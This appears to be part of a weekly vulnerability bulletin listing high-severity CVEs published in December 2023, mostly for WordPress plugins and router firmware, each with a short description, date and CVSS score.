shenzen_libituo_technology_co.,_ltd — lbt-t300-t310_firmware | Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi. | 2023-12-15 | 9.8 | CVE-2023-50469
silabs — gecko_software_development_kit | An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory. | 2023-12-15 | 9.1 | CVE-2023-4020
softnext — mail_sqr_expert | Softnext Mail SQR Expert is an email management platform. It has insufficient filtering for a special character within a specific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system commands, manipulate the system or disrupt service. | 2023-12-15 | 8 | CVE-2023-48380
softnext — mail_sqr_expert | Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. | 2023-12-15 | 7.5 | CVE-2023-48378
solarwinds — access_rights_manager | Sensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment. | 2023-12-21 | 7.6 | CVE-2023-40058
sourcecodester — best_courier_management_system | A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256. | 2023-12-17 | 9.8 | CVE-2023-6898
starnight — micro_http_server | In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI. | 2023-12-17 | 9.8 | CVE-2023-50965
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function. | 2023-12-20 | 9.8 | CVE-2023-50983
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function. | 2023-12-20 | 9.8 | CVE-2023-50984
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function. | 2023-12-20 | 9.8 | CVE-2023-50985
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function. | 2023-12-20 | 9.8 | CVE-2023-50986
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function. | 2023-12-20 | 9.8 | CVE-2023-50987
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function. | 2023-12-20 | 9.8 | CVE-2023-50988
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function. | 2023-12-20 | 9.8 | CVE-2023-50989
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function. | 2023-12-20 | 9.8 | CVE-2023-50990
tenda — i29_firmware | Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function. | 2023-12-20 | 9.8 | CVE-2023-50992
tongda — tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-16 | 9.8 | CVE-2023-6885
totolink — a7100ru_firmware | A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-18 | 9.8 | CVE-2023-6906
tutao — tutanota | Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victim’s computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue. | 2023-12-15 | 9.3 | CVE-2023-46116
u-blox — toby-l2 | A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2 which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280. | 2023-12-20 | 7.6 | CVE-2023-0011
uffizio — gps_tracker | A Remote Code Execution vulnerability exists in Uffizio’s GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources. | 2023-12-16 | 9.8 | CVE-2020-17485
uffizio — gps_tracker | An improper access control vulnerability exists in Uffizio’s GPS Tracker all versions that leads to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed. | 2023-12-16 | 7.5 | CVE-2020-17483
unrealircd — unrealircd | A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms. | 2023-12-16 | 7.5 | CVE-2023-50784
wangmarket — wangmarket | A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6886
wasmer_io — wasmer | Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4. | 2023-12-22 | 8.4 | CVE-2023-51661
web-soudan — mw_wp_form | The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. | 2023-12-16 | 9.8 | CVE-2023-6559
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop – Global Dropshipping. This issue affects Zendrop – Global Dropshipping: from n/a through 1.0.0. | 2023-12-20 | 10 | CVE-2023-25970
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0. | 2023-12-20 | 10 | CVE-2023-29384
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0. | 2023-12-20 | 10 | CVE-2023-49772
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23. | 2023-12-20 | 10 | CVE-2023-49773
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. | 2023-12-21 | 10 | CVE-2023-49778
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5. | 2023-12-20 | 9.9 | CVE-2023-23970
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1. | 2023-12-20 | 9.1 | CVE-2023-28170
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1. | 2023-12-20 | 9.1 | CVE-2023-29102
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2. | 2023-12-20 | 9.9 | CVE-2023-31215
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65. | 2023-12-20 | 9.9 | CVE-2023-31231
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in xtemos WoodMart – Multipurpose WooCommerce Theme. This issue affects WoodMart – Multipurpose WooCommerce Theme: from n/a through 1.0.36. | 2023-12-21 | 9.8 | CVE-2023-32242
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4. | 2023-12-20 | 9.3 | CVE-2023-32590
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40. | 2023-12-20 | 9.9 | CVE-2023-33318
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3. | 2023-12-20 | 9.9 | CVE-2023-34007
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0. | 2023-12-20 | 9.9 | CVE-2023-34385
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in realmag777 HUSKY – Products Filter for WooCommerce Professional. This issue affects HUSKY – Products Filter for WooCommerce Professional: from n/a through 1.3.4.2. | 2023-12-20 | 9.8 | CVE-2023-40010
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Premio Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2. | 2023-12-20 | 9.1 | CVE-2023-40204
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts – Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts – Enable Users to Submit Posts from the Front End: from n/a through 20230902. | 2023-12-20 | 9 | CVE-2023-45603
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.2023-12-209.9CVE-2023-46149
[email protected]
wordpress — wordpressMissing Authorization vulnerability in Clever plugins Delete Duplicate Posts allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Delete Duplicate Posts: from n/a through 4.8.9.2023-12-199.8CVE-2023-47754
[email protected]
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Porto Theme Porto Theme – Functionality. This issue affects Porto Theme – Functionality: from n/a before 2.12.1. | 2023-12-19 | 9.3 | CVE-2023-48738
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoonthemes Couponis – Affiliate & Submitting Coupons WordPress Theme. This issue affects Couponis – Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2. | 2023-12-19 | 9.8 | CVE-2023-49750
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoon themes Adifier – Classified Ads WordPress Theme. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. | 2023-12-20 | 9.3 | CVE-2023-49752
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. | 2023-12-20 | 9.3 | CVE-2023-49776
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0. | 2023-12-20 | 9.1 | CVE-2023-49814
wordpress — wordpress | The Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn’t be too long, as the 2FA codes are 6 digits. | 2023-12-18 | 9.8 | CVE-2023-6272
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1. | 2023-12-17 | 8.8 | CVE-2023-24380
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3. | 2023-12-20 | 8.3 | CVE-2023-28782
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BestWebSoft Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress: from n/a through 1.7.0. | 2023-12-20 | 8.5 | CVE-2023-29096
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Favethemes Houzez – Real Estate WordPress Theme. This issue affects Houzez – Real Estate WordPress Theme: from n/a before 2.8.3. | 2023-12-20 | 8.2 | CVE-2023-29432
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23. | 2023-12-20 | 8.5 | CVE-2023-30495
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10. | 2023-12-20 | 8.5 | CVE-2023-30750
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2. | 2023-12-20 | 8.1 | CVE-2023-31092
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CrawlSpider SEO Change Monitor – Track Website Changes. This issue affects SEO Change Monitor – Track Website Changes: from n/a through 1.2. | 2023-12-20 | 8.5 | CVE-2023-33209
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1. | 2023-12-18 | 8.8 | CVE-2023-33214
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Alex Raven WP Report Post allows SQL Injection. This issue affects WP Report Post: from n/a through 2.1.2. | 2023-12-18 | 8.8 | CVE-2023-34168
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1. | 2023-12-20 | 8.1 | CVE-2023-35876
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Themesflat Themesflat Addons For Elementor. This issue affects Themesflat Addons For Elementor: from n/a through 2.0.0. | 2023-12-19 | 8.3 | CVE-2023-37390
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6. | 2023-12-20 | 8.2 | CVE-2023-37871
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5. | 2023-12-20 | 8.3 | CVE-2023-40555
wordpress — wordpress | The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. | 2023-12-18 | 8.8 | CVE-2023-4311
wordpress — wordpress | Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects WP EXtra: from n/a through 6.2. | 2023-12-19 | 8.8 | CVE-2023-46212
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5. | 2023-12-18 | 8.8 | CVE-2023-46617
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Master slider Master Slider Pro allows SQL Injection. This issue affects Master Slider Pro: from n/a through 3.6.5. | 2023-12-18 | 8.8 | CVE-2023-47506
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3. | 2023-12-18 | 8.8 | CVE-2023-47787
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3. | 2023-12-18 | 8.8 | CVE-2023-47789
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7. | 2023-12-18 | 8.8 | CVE-2023-47806
wordpress — wordpress | Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects Participants Database: from n/a through 2.5.5. | 2023-12-19 | 8.8 | CVE-2023-48751
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4. | 2023-12-18 | 8.8 | CVE-2023-48755
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13. | 2023-12-18 | 8.8 | CVE-2023-48762
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator – Add Animated SVG Easily. This issue affects SVGator – Add Animated SVG Easily: from n/a through 1.2.4. | 2023-12-18 | 8.8 | CVE-2023-48766
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9. | 2023-12-18 | 8.8 | CVE-2023-48768
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3. | 2023-12-18 | 8.8 | CVE-2023-48769
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0. | 2023-12-18 | 8.8 | CVE-2023-48772
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4. | 2023-12-18 | 8.8 | CVE-2023-48773
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5. | 2023-12-18 | 8.8 | CVE-2023-48778
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0. | 2023-12-18 | 8.8 | CVE-2023-48781
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon. This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0. | 2023-12-18 | 8.8 | CVE-2023-49153
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator – easily Button Builder. This issue affects Button Generator – easily Button Builder: from n/a through 2.3.8. | 2023-12-18 | 8.8 | CVE-2023-49155
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.5. | 2023-12-18 | 8.8 | CVE-2023-49163
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra. This issue affects Ocean Extra: from n/a through 2.2.2. | 2023-12-19 | 8.8 | CVE-2023-49164
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2. | 2023-12-15 | 8.8 | CVE-2023-49197
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3. | 2023-12-15 | 8.8 | CVE-2023-49744
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23. | 2023-12-15 | 8.8 | CVE-2023-49749
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0. | 2023-12-17 | 8.8 | CVE-2023-49751
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments. This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.3.0. | 2023-12-18 | 8.8 | CVE-2023-49759
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage. This issue affects WPsoonOnlinePage: from n/a through 1.9. | 2023-12-18 | 8.8 | CVE-2023-49760
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce. This issue affects Product Enquiry for WooCommerce: from n/a through 3.0. | 2023-12-18 | 8.8 | CVE-2023-49761
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite. This issue affects CSprite: from n/a through 1.1. | 2023-12-18 | 8.8 | CVE-2023-49763
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4. | 2023-12-17 | 8.8 | CVE-2023-49769
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8. | 2023-12-17 | 8.8 | CVE-2023-49775
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4. | 2023-12-17 | 8.8 | CVE-2023-49816
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1. | 2023-12-17 | 8.8 | CVE-2023-49824
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX – Currency Switcher Professional for WooCommerce. This issue affects FOX – Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4. | 2023-12-17 | 8.8 | CVE-2023-49834
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5. | 2023-12-18 | 8.8 | CVE-2023-49840
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21. | 2023-12-18 | 8.8 | CVE-2023-49843
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0. | 2023-12-18 | 8.8 | CVE-2023-49844
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kuruluşu A.Ş. PayTR Taksit Tablosu – WooCommerce. This issue affects PayTR Taksit Tablosu – WooCommerce: from n/a through 1.3.1. | 2023-12-18 | 8.8 | CVE-2023-49853
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy – Smart Side Cart for WooCommerce. This issue affects Caddy – Smart Side Cart for WooCommerce: from n/a through 1.9.7. | 2023-12-18 | 8.8 | CVE-2023-49854
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3. | 2023-12-18 | 8.8 | CVE-2023-49855
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1. | 2023-12-18 | 8.8 | CVE-2023-50372
wordpress — wordpress | The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution. | 2023-12-18 | 8.8 | CVE-2023-5882
wordpress — wordpress | The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. | 2023-12-18 | 8.8 | CVE-2023-5886
wordpress — wordpress | The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘ajaxUploadFonts’ function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site’s server which may make remote code execution possible. | 2023-12-15 | 8.8 | CVE-2023-6827
wordpress — wordpress | The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the ‘content-dir’ HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server’s php.ini is configured with ‘allow_url_include’ set to ‘on’. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP. | 2023-12-23 | 8.1 | CVE-2023-6971
wordpress — wordpress | The Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-23 | 7.4 | CVE-2020-36769
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12. | 2023-12-20 | 7.1 | CVE-2023-26525
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2. | 2023-12-20 | 7.1 | CVE-2023-28788
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2. | 2023-12-20 | 7.6 | CVE-2023-30872
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7. | 2023-12-20 | 7.2 | CVE-2023-32128
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1. | 2023-12-20 | 7.6 | CVE-2023-32743
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce Product Vendors allows SQL Injection. This issue affects Product Vendors: from n/a through 2.1.76. | 2023-12-18 | 7.2 | CVE-2023-33331
